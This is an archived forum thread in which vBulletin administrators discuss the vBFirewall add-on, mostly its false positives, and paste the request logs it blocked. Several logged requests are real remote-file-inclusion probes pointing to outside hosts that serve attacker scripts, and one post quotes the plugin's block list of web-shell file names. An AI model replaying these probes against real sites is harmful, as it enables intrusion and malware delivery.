vb.org Archive

vb.org Archive (https://vborg.vbsupport.ru/index.php)
-   vBulletin 3.8 Add-ons (https://vborg.vbsupport.ru/forumdisplay.php?f=235)
-   -   vBFirewall v1.0 (https://vborg.vbsupport.ru/showthread.php?t=196791)

djbaxter 11-29-2008 10:44 PM

Thanks. :)

MrEyes 11-30-2008 09:57 AM

Quote:

1||1227923147||74.6.8.105||id=2&forumid=44&script= showthread||||Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
Quote:

Originally Posted by invisiblea (Post 1675251)
I tested this plugin on a very active forum for 1 month didnt made any problem, I would like to check this out for you..On it

If the mod is the same as it was before the reason this trigger occurs is this part of the query string:

Quote:

script=showthread
"script" is one of the trigger words as this can be used to pass javascript on a querystring. So this causes the "firewall" to block and create the email.

Celtkin 11-30-2008 07:30 PM

I am getting false positives as well

Quote:

Report:
============================

1||1228080110||70.117.163.62||do=viewsubscription& folderid=all||http://forums.thephins.com/usercp.php||Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4

DangerousDale 12-03-2008 08:52 PM

I have had very little issue with this firewall so far, I may have to turn it off while in admin CP to access one or 2 things but nothing that has caused any issue.

Today I was looking at my logs and the firewall has blocked some very real attacks on my site from bots:

Quote:

Report:
============================

1||1227884548||85.25.148.136||mod=http://www.mykr.net/bbs/id.txt?||||libwww-perl/5.805

============================
Info on this bot can be found here.

Thanks again for the firewall keep up the good work ;)

Orakk 12-06-2008 01:26 AM

Quote:

Originally Posted by DangerousDale (Post 1678037)
I have had very little issue with this firewall so far, I may have to turn it off while in admin CP to access one or 2 things but nothing that has caused any issue.

I have it running without issues on 374pl1. What are those things you refere to need the firewall disabled?

Cheers. :)

Edit: I was mistaken, thread subscription fails, interpetted as a hack attempt.

Quote:

Hello!

Hack Attempt has been successfully prevented for your vBulletin forums at:
SeriousCrunchers.Net

Report:
============================

||do=addsubscription&t=261||

Computer_Angel 12-08-2008 05:24 AM

This addon just base on the keywords list which define in the plugin, so it may lead to wrong detection too. Just look in the code you will the all the list, such as:
Quote:

"c99shell.php', 'shell.php', 'cmd.php','r57.php?phpinfo', 'r57.php?phpini', 'r57.php?cpu', 'r57.php?'
So if you have your php code file name as these above list then you could not run :D . Any if a hacker read this, they 'll modified their backdoor to another filename such as "a.php" then this script is .. useless.

4x4 Mecca 12-08-2008 05:47 PM

I'm on 3.7 but got two of these emails:
Code:

Hello!

Hack Attempt has been successfully prevented for your vBulletin forums at:
4x4 Mecca

Report:
============================

1||1228765395||83.233.30.77||flipped=http%3A%2F%2Fsites.google.com%2Fsite%2Forileyautopartsrludohn%2Fnys-ogs--restoration-nys-ogs+nys+ogs%0D%0Ahttp%3A%2F%2Fsites.google.com%2Fsite%2Forileyautopartsrludohn%2Fnys-senate---senate-majority-leader---senate-reports-nys-senate+nys+senate%0D%0Ahttp%3A%2F%2Fsites.google.com%2Fsite%2Forileyautopartsrludohn%2Fnysdoc-correctional-facilities-nysdoc+nysdoc%0D%0Ahttp%3A%2F%2Fsites.google.com%2Fsite%2Forileyautopartsrludohn%2Fnyship----health-insurance-nyship+nyship%0D%0Ahttp%3A%2F%2Fsites.google.com%2Fsite%2Forileyautopartsrludohn%2Fnyy-yankee-stadium-steiner-sports-nyy+nyy%0D%0Ahttp%3A%2F%2Fsites.google.com%2Fsite%2Forileyautopartsrludohn%2Fnz-lotto-results--auckland--nz-lotto-results-nz-nz-lotto-results+nz+lotto+results%0D%0Ahttp%3A%2F%2Fsites.google.com%2Fsite%2Forileyautopartsrludohn%2Fo-riley-auto-parts-after-market-auto-parts-o-riley-auto-parts+o+riley+auto+parts%0D%0Ahttp%3A%2F%2Fsites.google.com%2Fsite%2Forileyautopartsrludohn%2Fo2-arena-london-ny-daily-news-o2-arena-london+o2+arena+london%0D%0Ahttp%3A%2F%2Fsites.google.com%2Fsite%2Forileyautopartsrludohn%2Foahu-attractions--oahu-attractions-map--tours-oahu-attractions+oahu+attractions%0D%0Ahttp%3A%2F%2Fsites.google.com%2Fsite%2Forileyautopartsrludohn%2Foahu-car-rentals-car-rental-discounts-oahu-car-rentals-hertz-oahu-car-rentals+oahu+car+rentals%0D%0Ahttp%3A%2F%2Fsites.google.com%2Fsite%2Forileyautopartsrludohn%2Foahu-tours-arizona-memorial-waikiki-oahu-tours+oahu+tours%0D%0Ahttp%3A%2F%2Fsites.google.com%2Fsite%2Forileyautopartsrludohn%2Foak-bonsai-price-comparison-blue-oak-bonsai-oak-bonsai+oak+bonsai%0D%0Ahttp%3A%2F%2Fsites.google.com%2Fsite%2Forileyautopartsrludohn%2Foak-dining-table-square-oak-dining-table-dining-furniture-oak-dining-table+oak+dining+table%0D%0Ahttp%3A%2F%2Fsites.google.com%2Fsite%2Forileyautopartsrludohn%2Foak-ice-box--early-american--oak-ice-box-coffee-table-oak-ice-box+oak+ice+box%0D%0Ahttp%3A%2F%2Fsites.google.com%2Fsite%2Forileyautopartsrludohn%2Foak-island-treasure-dug-oak-island-treasure+oak+island+treasure%0D%0Ahttp%3A%2F%2Fsites.google.com%2Fsite%2Forileyautopartsrludohn%2Foak-ridger-oak-ridger-news-world-press-oak-ridger+oak+ridger%0D%0Ahttp%3A%2F%2Fsites.google.com%2Fsite%2Forileyautopartsrludohn%2Foak-tables-traditional-styles-oak-tables+oak+tables%0D%0Ahttp%3A%2F%2Fsites.google.com%2Fsite%2Forileyautopartsrludohn%2Foak-veneer---oak-veneered-mdf---white-oak-oak-veneer+oak+veneer%0D%0A||http://www.4x4mecca.com/forum/misc.php?do=bbcode||Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)


mac-warez 12-08-2008 11:42 PM

my logfile reads this

1||1228766931||||||||
1||1228767166||||||||

what does that mean?

Madlike 12-09-2008 12:26 PM

Quote:

Originally Posted by mac-warez (Post 1681312)
my logfile reads this

1||1228766931||||||||
1||1228767166||||||||

what does that mean?

Maybe IP Adresses :rolleyes:

djbaxter 12-09-2008 12:32 PM

Quote:

Originally Posted by Madlike (Post 1681617)
Maybe IP Adresses :rolleyes:

Not likely... it's 10 digits, not 9.

mac-warez 12-09-2008 02:43 PM

hmm. It should tell you what the attacker tried to do

Mr. Baws 12-09-2008 09:44 PM

1||1228866074||MY.IP.ADD.RESS||url=http%3A%2F%2FXXXXX.XXX%2Ffiles%2F150219639%2FSOMETHING.rar||http://www.mysite.com/XXXXXXXXX/756-XXXXXXXXX.html||Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4Error Opening Logfile.

problem with vbAnonymizer

TomJames 12-11-2008 07:06 PM

Hmm might have to install this.

Skyrider 12-11-2008 07:54 PM

While this is a great plugin, it prevents me checking logs through the admin panel, giving me errors. Possible you can fix this issue?

Submerge 12-12-2008 04:51 PM

Let me bookmark this!

sheryjutt 12-12-2008 08:06 PM

Quote:

Originally Posted by RvG2 (Post 1669502)
I was hacked more or less 10 times this year... NOW LET MET TRY THIS.

Thank you so much in advanced.

;)Heehehehe

Why Do U Not Use VB Security ;)


Contact me at pm or @ yahoo ....

my yahoo id : system.k1ll3r


:D

IIAnDoII 12-14-2008 11:25 AM

I just got 2 emails saying "Hack Attempt prevented by vBFirewall‏"

but when i goto http://www.yourvbforumurl.com/logfile_worms.txt (with my forum name)

it just says page not found

the 2 emails say

Code:

Hello!
 
Hack Attempt has been successfully prevented for your vBulletin forums at:

 
Report:
============================
 
1||1229255228||80.83.90.50||page=http://xaoss.com/id.txt??||||Netscape 4.78/U.S., 25-Jun-01; (c) 1995-2000
 
============================


and


Code:

Hello!
 
Hack Attempt has been successfully prevented for your vBulletin forums at:

 
Report:
============================
 
1||1229254995||80.83.90.50||page=http://www.geocities.com/axenses/id.txt???||||Netscape 4.78/U.S., 25-Jun-01; (c) 1995-2000
 
============================


what does all this mean and is it working correct ?

Orakk 12-16-2008 08:30 AM

Quote:

Originally Posted by invisiblea (Post 1675251)
I tested this plugin on a very active forum for 1 month didn't made any problem, I would like to check this out for you..On it

I've tested this plugin on 374 & 380 now and get the same problem regarding, 'subscribe to thread' failing. Blocking all bots is fine with me but the subscription issue makes the firewall unusable.

Great idea and good luck with progress. :up:

allartech 12-17-2008 07:24 AM

1 Attachment(s)
verygood product I tried it on my forum and 100% working
I'm using Vbulletin Version 3.8.0 Release Candidate 1
thank you very much
:)

allartech 12-17-2008 07:28 AM

Quote:

Originally Posted by Orakk (Post 1686469)
I've tested this plugin on 374 & 380 now and get the same problem regarding, 'subscribe to thread' failing. Blocking all bots is fine with me but the subscription issue makes the firewall unusable.

Great idea and good luck with progress. :up:

thank you Orakk
I got same problem
:confused:
waiting for

TsirhCitna 12-17-2008 11:59 AM

I installed this last night and had 14 emails this morning with basically no information. My log reads:

Code:

1||1229487186||||||||
1||1229487186||||||||
1||1229493626||||||||
1||1229493631||||||||
1||1229504466||||||||
1||1229504472||||||||
1||1229511852||||||||
1||1229511856||||||||
1||1229517334||||||||
1||1229517334||||||||


Skyrider 12-19-2008 11:50 AM

invisiblea, would be great if you'd reply to this thread as you haven't done so in a while.

repairman jack 12-20-2008 01:15 PM

Quote:

Originally Posted by mac-warez (Post 1681312)
my logfile reads this

1||1228766931||||||||
1||1228767166||||||||

what does that mean?

This is all I'm receiving as well.

Also, even though I have the option turned on I can't view logfile_worms.txt. It's not being created or is not in my forums directory. Suggestions?

denman75 12-22-2008 07:37 AM

it seems to be working
this is what i got in my mailbox

Hello!

Hack Attempt has been successfully prevented for your vBulletin forums at:
http://bullterrierforum.nl

Report:
============================

1||1229937338||116.122.158.46||systempath=http://www.elitewheels.ru/images/stories/.cnn?||||libwww-perl/5.79

============================

if i paste the url and i visit this page i got a warning from nod32 that there is some sort of trojan
really weird imho .

but it seems to be working

Orakk 12-22-2008 12:27 PM

Quote:

Originally Posted by allartech (Post 1687220)
thank you Orakk
I got same problem
:confused:
waiting for

Your welcome AA.. :up:

invisiblea - Any updates on progress? If stumped, other coders may lend a hand if you ask ..

invisiblea 12-22-2008 03:49 PM

Sorry for late reply.. within 2-3 days new version will be out..

denman75 12-23-2008 06:10 AM

relax its holiday time
them few more hours wont be biggy

akee 12-26-2008 05:13 AM

hi!

i try this mod, and i get this worm:
Code:

1||1230274881||210.105.132.249||t=http://204.2.183.2/babycaleb/picture.htm?||||Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
how can i kill this?

vbplusme 12-26-2008 07:14 AM

How do you know its a worm? The IP address is from Korea. What do you see on your site?

vbplusme 12-26-2008 07:23 AM

The ip address that is hosting the badguy script is in the US/Colorado

They list abuse@ntt.net to report abuses. To get them to kill off the hacker script. If you tried to access that html, you likely have had The trojan is loaded on your PC, looks like the name of the trojan is Trojan Horse Downloader.Generic8.COX. You might want to do a few searches to see how to remove it from your local system.

HTH

akee 12-26-2008 07:53 AM

my site is good, because i copy on my server root .htaccess file. if this file is missing, my site isnt good, my antivirus is lock my site

taheri6 12-29-2008 06:51 AM

I use a third party product called ASL which does the same thing as this mod on a global scale (server wide) and much more (linux servers only). Cost of that is less then the vb license too.

James Desalus 12-29-2008 10:26 PM

Quote:

Originally Posted by FF|Skyrider (Post 1683367)
While this is a great plugin, it prevents me checking logs through the admin panel, giving me errors. Possible you can fix this issue?

Ditto. This is a deal breaker for me.

scottct1 12-31-2008 04:02 PM

Also users have having problems subscribing to threads (I applied the unsubscribe patch)

The command getting caught is do=addsubscription

pein87 12-31-2008 04:24 PM

Tried and installed this on vbulletin 3.8.0 rc 2 and 3.7.4 locks admin out of certain parts of the acp could you add to the script that if the user has a valid admin login they can gain access to the acp if not then reject them.

RTMdotORG 12-31-2008 11:41 PM

i have this...
i got 5 emails saying it blocked 5 attempts from hacking...
then it bypassed and now im hacked....
fixed it once, then they hacked again....
www.ripthemic.org

heres wut it showed when prevented...

1||1230677435||66.156.165.120||do=viewsubscription ||http://www.ripthemic.org/forums/usercp.php||Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17
1||1230677439||66.156.165.120||do=viewsubscription ||http://www.ripthemic.org/forums/usercp.php||Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17
1||1230677448||66.156.165.120||do=viewsubscription ||http://www.ripthemic.org/forums/usercp.php||Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17
1||1230734502||124.187.20.43||do=removesubscriptio n&t=3||http://ripthemic.org/forums/showthre...1||Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3
1||1230765308||67.167.16.183||do=viewsubscription| |http://www.ripthemic.org/forums/usercp.php||Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.2)


is it possible that people are having problems with subscriptions because theres a security issue???

all the actions have to do with subscriptions and everyone is talking about having issues with subscriptions....

last email i got was at 6:16 PM today, right before the site went down...


Had Me Site Fixed AGAIN...
They Hacked AGAIN!!!
This Time It Shows Me...
1||1230777472||98.100.180.113||do=viewsubscription ||||Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5
1||1230777561||98.100.180.113||do=viewsubscription ||||Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5
1||1230816616||86.96.229.88||s=&do=add&dostyleid=1 0&title=headinclude&group=all&searchstring=&expand set=10||http://ripthemic.org/forums/admincp/||Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)
1||1230816628||86.96.229.88||s=&do=add&dostyleid=1 0&title=headinclude&group=all&searchstring=&expand set=10||http://ripthemic.org/forums/admincp/||Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)

This Doesnt Work Very Well...

Arrogant-One 01-03-2009 07:48 AM

<font face="Georgia">I installed this mod on my vB 3.6.7 forum yesterday. It significantly slowed my site down to a crawl. On top of that the so called attacks it said occurred since I installed it have been done by Googlebots and Yahoo Slurp bots.

Whatever! If anyone's vB forum has something to fear from Googlebots and Slurp bots then this mod is overly protective in my opinion.

Time of Uninstall - 7:49pm</font>

sys-tem 01-04-2009 02:20 PM

This is attempt for hacking or only one error on script?

Report:
============================

1||123108xxxx||90.145.22.71||cx=0085147425190053xx xx%3Astktp-0amaq&cof=FORID%3A9&q=java+script&do=process&showp osts=0&s=&x=0&y=0||http://www.mysite.com/forumdisplay.p...1||Mozilla/5.0 (Windows; U; Windows NT 6.0; nl; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5

============================

mcyates 01-04-2009 02:39 PM

Thanks

Infopro 01-09-2009 11:35 PM

Check with your host to see if you have mod security installed. If yes, this script really shouldn't be needed. You also cannot edit templates without first disabling this.


All times are GMT. The time now is 09:00 AM.

Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.

X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.01640 seconds
  • Memory Usage 1,846KB
  • Queries Executed 10 (?)
More Information
Template Usage:
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (5)bbcode_code_printable
  • (16)bbcode_quote_printable
  • (1)footer
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (6)option
  • (1)pagenav
  • (1)pagenav_curpage
  • (4)pagenav_pagelink
  • (1)post_thanks_navbar_search
  • (1)printthread
  • (40)printthreadbit
  • (1)spacer_close
  • (1)spacer_open 

Phrase Groups Available:
  • global
  • postbit
  • showthread
Included Files:
  • ./printthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/class_bbcode_alt.php
  • ./includes/class_bbcode.php
  • ./includes/functions_bigthree.php 

Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • printthread_start
  • pagenav_page
  • pagenav_complete
  • bbcode_fetch_tags
  • bbcode_create
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • printthread_post
  • printthread_complete